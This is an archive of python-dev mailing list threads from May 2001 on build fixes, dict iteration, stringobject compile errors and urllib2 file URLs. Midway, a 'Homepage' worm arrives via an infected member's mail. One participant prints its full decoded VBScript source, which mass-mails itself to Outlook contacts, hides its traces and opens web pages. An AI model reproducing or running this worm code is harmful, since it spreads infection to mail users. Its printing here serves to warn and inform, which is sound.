2001 From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 8 May 2001 10:45:18 -0400 (EDT) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: References: Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Michael Hudson writes: > If you don't include termio.h the build breaks on alpha/OSF1. This > sounds to me like OSF1's headers are broken (you can't include > sys/ioctl.h without including termio.h first, it seems, or you get > complaints about struct termio being undefined). So I'd suggest > > +#ifdef __osf__ > #include <termio.h> > +#endif > > and then see if the build breaks anywhere else (I love unix). Does it make more sense to do this or to test for termio.h in configure? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From m.favas at per.dem.csiro.au Tue May 8 16:47:39 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Tue, 08 May 2001 22:47:39 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com> Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au> Guido van Rossum wrote: > > > A change to termios.c in the last couple of days to #include termio.h as > > well as termios.h breaks the build on FreeBSD, which has only termios.h - > > needs an autoconf test? There'll probably be other similar systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. > > Mark, can you please enter this in the bug database and assign it to > whoever checked in the change?
:-) Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred Drake -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From thomas at xs4all.net Tue May 8 17:52:49 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 17:52:49 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200 References: <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <20010508175248.E16486@xs4all.nl> On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote: [ Jack wants to add the +/- 1000 extra files from the MacPython source tree to the Python CVS repository ] > It's actually 830 files. This is 320 .py files (130 in Lib, the rest in > Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build > system), 30 resource files and then assorted things (html documentation, > scripts to drive the distribution builder, etc). I'd say merge it. If there had been decent CVS clients for the mac when you started, those files would have been in the CVS tree already. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From skip at pobox.com Tue May 8 20:22:17 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 8 May 2001 13:22:17 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl> References: <20010508141000.A16486@xs4all.nl> <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <15096.14681.773554.729550@beluga.mojam.com> Jack> It's actually 830 files. ... 120 .c/.h files ... How many of those 120 files are variants of existing source files that (in theory) could be merged with their mainline counterparts? 
Skip From mwh at python.net Wed May 9 00:27:59 2001 From: mwh at python.net (Michael Hudson) Date: 08 May 2001 23:27:59 +0100 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)" References: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > If you don't include termio.h the build breaks on alpha/OSF1. This > > sounds to me like OSF1's headers are broken (you can't include > > sys/ioctl.h without including termio.h first, it seems, or you get > > complaints about struct termio being undefined). So I'd suggest > > > > +#ifdef __osf__ > > #include > > +#endif > > > > and then see if the build breaks anywhere else (I love unix). > > Does it make more sense to do this or to test for termio.h in > configure? If you're asking *me*, I have no idea. I'd hope that no system would be as broken as osf1 is in this regard, but then I'd have hoped that osf1 wasn't this broken too... I guess the test in configure is "safer" in some sense. Getting this perfectly right would probably require more autoconf hackery than one can possibly imagine... ncurses generates an amk script from ./configure that is then run to produce term.h, but I'm not sure that all of that is devoted to including the right headers. can-we-just-have-TERMIOS-back?-ly y'rs M. -- Good? Bad? Strap him into the IETF-approved witch-dunking apparatus immediately! -- NTK now, 21/07/2000 From tim.one at home.com Wed May 9 08:48:12 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 02:48:12 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? 
In-Reply-To: <20010508133638.Z16486@xs4all.nl> Message-ID: [Tim] > Given the new dict iterators in 2.2, there's an easier fast way > that doesn't mutate the dict even under the covers: > > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") [Thomas Wouters] > You probably want: > > arb = dict.iteritems().next > > so that you don't keep on returning the same key,value pair. No, I would not want that. If "arbitrary" suffices, then by defn. *any* element is "good enough". If it's not good enough to get the same one back every time, then I want a stronger guarantee about what arb() returns than the inexplicable behavior of repeated calls to dict.iteritems().next in the presence of dict mutation. But as I've said several times before , I'm still asking for an algorithm where arb() is actually useful (as opposed to .popitem(), which is dead easy to explain in the presence of mutation; your version of arb() can, e.g., return a given entry more than once, may skip entries, and may raise StopIteration with unexamined entries remaining in the dict). not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly y'rs - tim From tim.one at home.com Wed May 9 09:42:00 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 03:42:00 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au> Message-ID: [Mark Favas] > Changes in the last few hours (hi Tim!) Hi Mark! Sorry about that! > to stringobject compile (I'd guess) on MS You guess right -- and under two flavors of Windows . > (and on Compaq's Tru64 compiler), Figures. > but produce the following with gcc on Solaris and FreeBSD: > > gcc -c -g -O2 -Wall -Wstrict-prototypes -I. 
-I./Include > -DHAVE_CONFIG_H -o Objects/stringobject.o Objects/stringobject.c > Objects/stringobject.c: In function `PyString_FromStringAndSize': > Objects/stringobject.c:76: invalid lvalue in unary `&' > Objects/stringobject.c:80: invalid lvalue in unary `&' > Objects/stringobject.c: In function `PyString_FromString': > Objects/stringobject.c:130: invalid lvalue in unary `&' > Objects/stringobject.c:134: invalid lvalue in unary `&' > *** Error code 1 Fair enough: I tried to use a cast as an lvalue in those 4 places, all of the form: PyString_InternInPlace(&(PyObject *)op); where op is declared PyStringObject*. Strictly speaking, that ain't legal, but changing it to: PyObject *t = (PyObject *)op; PyString_InternInPlace(&t); is. You may wonder WTF the difference is. That's easy: the rewrite doesn't use a cast expression as an lvalue . sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs - tim From jack at oratrix.nl Wed May 9 10:16:29 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 09 May 2001 10:16:29 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by , Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl> > > Jack> It's actually 830 files. ... 120 .c/.h files ... > > How many of those 120 files are variants of existing source files that (in > theory) could be merged with their mainline counterparts? None (unless you would count macmodule.c as a variant of posixmodule.c). I think macmain.c started out as a clone of pythonmain.c, but I think they're too different to merge (but I'll have a look). Hmm, now that I think of it macmodule and posixmodule could possibly be merged. 
It's fun to see how much statistics I gather about MacPython in just a few days:-) -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From tim.one at home.com Wed May 9 10:20:12 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 04:20:12 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: <20010508070501.A25794@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Shouldn't the entry in the __future__ file be: > > nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) > > or am I misunderstanding something? Until nested_scopes *is* the rule, the Mandatory Release field is just a guess about the future. Changing it to (2, 2, 0, "alpha", 0) right *now* would be wrong, since it would change it from a guess about the future to a false statement about the present. It must be changed when nested_scopes become mandatory; it needn't be changed before then (unless we delay making them mandatory beyond 2.2 final), although if somebody thinks they have a good use for moving the guess up, fine, just so long as they don't move the guess to or before 2.2a0. From thomas at xs4all.net Wed May 9 10:58:50 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 10:58:50 +0200 Subject: [Python-Dev] Crashes w/ CVS tree Message-ID: <20010509105850.F16486@xs4all.nl> I'm getting a crash with Python compiled from a freshly updated CVS tree, even when running just './python'. It crashes during the loading of os.pyc. It doesn't crash if I start python with -S, and it doesn't crash if I remove *.pyc first: centurion:~/python/python-2.2/dist/src/linux> ./python Python 2.2a0 (#4, May 9 2001, 09:52:29) [GCC 2.95.4 20010506 (Debian prerelease)] on linux2 Type "copyright", "credits" or "license" for more information. 
>>> centurion:~/python/python-2.2/dist/src/linux> ./python Segmentation fault If I remove os.pyc only, I get the enlightning: Fatal Python error: PyString_InternInPlace: strings only please! Abort (core dumped) I would blame Tim , except that when examining the corefile I found some pointers to other causes. The 'original' crash occurs because cmp_outcome() is passed an invalid PyObject, with most of its function slots pointing to the middle of the glibc-internal '__morecore()' function. Examining the stack off of which the invalid item was popped reveals that the next-to-last item is an iterator. So maybe I should blame Guido instead, either for the iterator or for rich comparisons ;) From thomas at xs4all.net Wed May 9 11:14:32 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 11:14:32 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112 In-Reply-To: ; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700 References: <20010509105850.F16486@xs4all.nl> Message-ID: <20010509111432.G16486@xs4all.nl> On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Objects > In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects > > Modified Files: > stringobject.c > Log Message: > Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to > restore correct semantics. This apparently fixed my problem: On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote: > > I'm getting a crash with Python compiled from a freshly updated CVS tree, > even when running just './python'. It crashes during the loading of os.pyc. > It doesn't crash if I start python with -S, and it doesn't crash if I remove > *.pyc first: That ought to teach me to spend my morning doing something fun -- it turned out to be useless :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
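Tim's `arb()` from the "non-mutating 'choose'" thread needs nothing more than a fresh iterator per call. A minimal sketch of the same function in present-day Python 3 spelling, assuming `iter(d.items())` plus the built-in `next()` as stand-ins for 2.2's `dict.iteritems().next()`; the `stock` dict is made-up sample data:

```python
def arb(d):
    """Return an arbitrary (key, value) pair from d without mutating it.

    Same contract as Tim Peters' arb(): raises KeyError on an empty dict.
    """
    if d:
        # A new iterator on every call, so an unchanged dict keeps
        # yielding the same pair on repeated calls.
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")


stock = {"spam": 3, "eggs": 12}
pair = arb(stock)
print(pair in stock.items())  # True
print(len(stock))             # 2: arb() leaves the dict intact
stock.popitem()               # popitem(), by contrast, removes what it returns
print(len(stock))             # 1
```

Binding `next` to one long-lived iterator, as Thomas suggests, would step through the pairs instead, and in Python 3 that iterator raises `RuntimeError` if the dict changes size while it is live.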
From tim.one at home.com Wed May 9 11:29:31 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 05:29:31 -0400 Subject: [Python-Dev] Crashes w/ CVS tree In-Reply-To: <20010509105850.F16486@xs4all.nl> Message-ID: [Thomas Wouters] > I'm getting a crash with Python compiled from a freshly updated CVS > tree,even when running just './python'. I did too, for a little while, but it's gone away. > ... > Fatal Python error: PyString_InternInPlace: strings only please! > Abort (core dumped) > > I would blame Tim , I would too. Please update, and if stringobject.c changes, try again. I'm sure this is my fault, but I'm too sleepy to figure out why, and I did change *something* at random that appeared to make it go away . it's-all-gcc's-fault-ly y'rs - tim From Greg.Wilson at baltimore.com Wed May 9 17:49:29 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 11:49:29 -0400 Subject: [Python-Dev] Homepage Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Hi! You've got to see this page! It's really cool ;O) -------------- next part -------------- A non-text attachment was scrubbed... Name: homepage.HTML.vbs Type: application/octet-stream Size: 2419 bytes Desc: not available URL: From guido at digicool.com Wed May 9 19:08:22 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 12:08:22 -0500 Subject: [Python-Dev] Homepage In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400." <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Greg Wilson's computer was infected by a virus which got propagated to python-dev. Do NOT open the attachment! 
--Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at pythonware.com Wed May 9 18:12:00 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 9 May 2001 18:12:00 +0200 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid> Greg's mail program wrote: > Hi! > > You've got to see this page! It's really cool ;O) > Content-Type: application/octet-stream; > name="homepage.HTML.vbs" > Content-Transfer-Encoding: quoted-printable > Content-Disposition: attachment; > filename="homepage.HTML.vbs" when will we see the first "homepage.HTML.py" virus? Cheers /F From esr at thyrsus.com Wed May 9 18:20:24 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 9 May 2001 12:20:24 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500 References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <20010509122024.A416@thyrsus.com> Guido van Rossum : > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Some of us -- heh, heh -- aren't vulnerable to attachment trojans. I could almost (not quite, but almost) love the crackers and script kiddiez of the world for what they're doing to Microsoft... -- Eric S. Raymond We shall not cease from exploration, and the end of all our exploring will be to arrive where we started and know the place for the first time. -- T.S. 
Eliot From fdrake at cj42289-a.reston1.va.home.com Wed May 9 18:21:27 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:21:27 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update of the maintenance branch (for Python 2.1.1). From barry at digicool.com Wed May 9 18:23:26 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 9 May 2001 12:23:26 -0400 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <15097.28414.354061.170478@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Greg Wilson's computer was infected by a virus which got GvR> propagated to python-dev. Do NOT open the attachment! Darn, and I was just finishing up the vbs.el script so my XEmacs/VM reader could open it. share-the-pain-share-the-fun-ly y'rs, -Barry From fdrake at cj42289-a.reston1.va.home.com Wed May 9 18:47:27 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:47:27 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update of the development branch (for Python 2.2). From pedroni at inf.ethz.ch Wed May 9 19:12:20 2001 From: pedroni at inf.ethz.ch (Samuele Pedroni) Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST) Subject: [Python-Dev] Homepage Message-ID: <200105091712.TAA05172@core.inf.ethz.ch> Hi. [GvR] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! 
Here's the beast ("decrypted" and in a cage): ("decrypted" and in a cage): (we got it also on the old jpython-interest) MS has really increased computer usability, when I was younger (and I'm not that old) one bad guy had to use assembler to cause some damage, now thanks to MS, that don't cares much about security but likely a lot about self-confindence, everybody can feel very clever and proud writing such things ... and spamming the whole internet. On Error Resume Next Set WS = CreateObject("WScript.Shell") Set FSO= Createobject("scripting.filesystemobject") Folder=FSO.GetSpecialFolder(2) Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1) Do While InF.AtEndOfStream<>True ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf Loop Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true) OutF.write ScriptBuffer OutF.close Set FSO=Nothing If WS.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If Set s=CreateObject("Outlook.Application") Set t=s.GetNameSpace("MAPI") Set u=t.GetDefaultFolder(6) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).close u.Items.Item(i).delete End If Next Set u=t.GetDefaultFolder(3) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).delete End If Next Randomize r=Int((4*Rnd)+1) If r=1 then WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm") elseif r=2 Then WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm") elseif r=3 Then WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm") ElseIf r=4 Then WS.Run("http://sheila.issexy.tv/1.htm") End If Function Mailit() On Error Resume Next Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Mapi=Outlook.GetNameSpace("MAPI") Set Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount Set Mail = Outlook.CreateItem(0) Set Contact = ListIndex.AddressEntries(Count) Mail.To = 
Contact.Address Mail.Subject = "Homepage" Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf Set Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.HTML.vb$" Mail.DeleteAfterSubmit = True If Mail.To <> "" Then Mail.Send WS.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function PS: the "decryption" was done in python ;) From tim.one at home.com Wed May 9 19:47:22 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 13:47:22 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Note that the same virus went out under the name of John G. Michopoulos on the JPython (not Jython!) mailing list. Here's detailed info on the virus (incl. simple removal instructions if you got bit): http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d at mm.html Doesn't appear to be worse than a nuisance. Anyone who has used Windows Update within the last year and installed the "critical updates" it recommends should have gotten a popup box warning that the attachment was trying to access the Address Book, telling you it's probably a virus, and advising to accept the "No, don't allow this" default. you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs - tim From Greg.Wilson at baltimore.com Wed May 9 20:50:25 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 14:50:25 -0400 Subject: [Python-Dev] apology Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com> My apologies to all --- yes, my machine was hit by a virus that flooded the known universe with email. 
Sorry for any grief it has caused anyone, Greg From tim.one at home.com Wed May 9 21:30:41 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 15:30:41 -0400 Subject: [Python-Dev] test_urllib2 fails on Win98SE Message-ID: test_urllib2 takes > 30 seconds, then fails: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file if not host or \ socket.error: host not found The URL it's passing is file://c:\code\python\dist\src\lib\urllib2.pyc If I change test_urllib2's file_url = "file://%s" % urllib2.__file__ to (adding another slash) file_url = "file:///%s" % urllib2.__file__ then it fails like this instead, but very quickly: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ?
f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file return addinfourl(open(url2pathname(file), 'rb'), IOError: [Errno 2] No such file or directory: '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc' Here's what I know about URLs: . Here's what I know about file URLs: . Here's what I know about file URLs on Windows: . If I type the original file://c:\code\python\dist\src\lib\urllib2.pyc into IE's address bar, it actually *executes* urllib2. From mwh at python.net Wed May 9 21:50:34 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 20:50:34 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700" References: Message-ID: "Fred L. Drake" writes: > ! fd = PyObject_AsFileDescriptor(obj); > ! if (fd == -1) { > ! if (PyInt_Check(obj)) { ^^^^^^^^^^^^^^^^ this is a bit pointless. I admit ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? TypeError: tcgetattr, arg 1: can't extract file descriptor from "int" is a bit confusing, but I'm not sure ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? error: (9, 'Bad file descriptor') is any better than: ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? 
ValueError: file descriptor cannot be a negative integer (-2) which is what you get after applying this patch: Index: Modules/termios.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v retrieving revision 2.26 diff -c -r2.26 termios.c *** Modules/termios.c 2001/05/09 17:53:06 2.26 --- Modules/termios.c 2001/05/09 19:49:52 *************** *** 37,43 **** fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! fd = PyInt_AS_LONG(obj); } else { char* tname; --- 37,43 ---- fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! return 0; } else { char* tname; Cheers, M. From fdrake at acm.org Wed May 9 22:09:09 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 9 May 2001 16:09:09 -0400 (EDT) Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: References: Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Michael Hudson writes: > this is a bit pointless. You're right! (Hey, it was your patch. ;) I'm checking in a different patch -- essentially, PyObject_AsFileDescriptor() does the right thing, and we don't ever need to second guess it. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh at python.net Wed May 9 22:13:46 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 21:13:46 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > I've attached the patch. 
Due to a small reorganisation the patch is > a little longer -- symmetry has its price at C level too ;-) I may be being dense, but can you explain what's going on here: ->> u'\u00e3'.encode('latin-1') '\xe3' ->> u'\u00e3'.encode("latin-1").decode("latin-1") Traceback (most recent call last): File "", line 1, in ? UnicodeError: ASCII encoding error: ordinal not in range(128) Can you come up with some other example I can use it tomorrow's python-dev summary? Cheers, M. -- Remember - if all you have is an axe, every problem looks like hours of fun. -- Frossie -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html From mwh at python.net Wed May 9 22:18:47 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 21:18:47 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 References: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > this is a bit pointless. > > You're right! (Hey, it was your patch. ;) So it was! I must have uploaded a slightly stale version of the patch, because I noticed this when cvs update conflicted with what I had in Modules/termios.c... oops. > I'm checking in a different patch -- essentially, > PyObject_AsFileDescriptor() does the right thing, and we don't ever > need to second guess it. I was a bit concerned that the error should contain the function name. On reflection, I agree that the code is so much simpler that it's a win. Cheers, M. -- Java sucks. [...] Java on TV set top boxes will suck so hard it might well inhale people from off their sofa until their heads get wedged in the card slots. --- Jon Rabone, ucam.chat From paulp at ActiveState.com Wed May 9 22:48:38 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Wed, 09 May 2001 13:48:38 -0700 Subject: [Python-Dev] test_urllib2 fails on Win98SE References: Message-ID: <3AF9AD26.AC6DD323@ActiveState.com> Tim Peters wrote: > >... 
> > Here's what I know about file URLs on Windows: . We constantly run into these problems with Komodo. The long and short is that file URL handling on Windows is totally different than on Unix and platform-specific code is probably appropriate. Here's what I know: IE treats the following equivalently: c:\temp\diff.txt file:c:\temp\diff.txt file:/c:\temp\diff.txt file://c:\temp\diff.txt file:///c:\temp\diff.txt file:///////////////////////////////c:\temp\diff.txt You can also reverse backslashes to slashes and slashes to backslashes if you like. Interestingly, though, UNC paths seem to work okay (no matter how you do the slashes and backslashes): file://americano\home\paulp\foo.html UNC paths seem to only allow two leading slashes/backslashes. Truly this is a new level of "be liberal in what you accept". The algorithm is probably something like: 1. normalize to forward slashes. 2. Remove "file:". 3. What you have left should be of the form: //machine/path or (/*)x:/path Where x is the drive letter. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From fredrik at effbot.org Thu May 10 01:19:40 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Thu, 10 May 2001 01:19:40 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> tim wrote: > Modified Files: > stropmodule.c > Log Message: > SF bug #422088: [OSF1 alpha] string.replace(). > Platform blew up on "123".replace("123", ""). Michael Hudson pinned the > blame on platform malloc(0) returning NULL. any reason why the #ifdef MALLOC_ZERO_RETURNS_NULL macro (in pyport.h) isn't set / doesn't take care of this? (and is it just me, or does the strop.replace function allocate a buffer, copy the result to that buffer, only to copy it into a string and throw the buffer away? 
no wonder u"".replace() is 30% faster than "".replace() ;-)

Cheers /F

From tim at digicool.com Thu May 10 01:39:08 2001
From: tim at digicool.com (Tim Peters)
Date: Wed, 9 May 2001 19:39:08 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>
Message-ID:

[Fredrik Lundh]
> any reason why the
>
>     #ifdef MALLOC_ZERO_RETURNS_NULL
>
> macro (in pyport.h) isn't set / doesn't take care of this?

The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up being plain malloc. As Michael noted in the bug report, it could have used PyMem_Malloc() instead and avoided the problem. But I chose not to do that, since special-casing a result of 0 was more efficient for reasons other than malloc. However:

> (and is it just me, or does the strop.replace function allocate
> a buffer, copy the result to that buffer, only to copy it into a
> string and throw the buffer away?

Yes. And I'm returning something now that mustn't be free()'ed when the result length is 0. Will fix.

> no wonder u"".replace() is 30% faster than "".replace() ;-)

For a given number of characters or bytes ?

From tim.one at home.com Thu May 10 01:46:13 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 19:46:13 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To:
Message-ID:

Oh, fuck. Somebody remind me why we have both stropmodule.c and stringobject.c? These bugs exist in both.

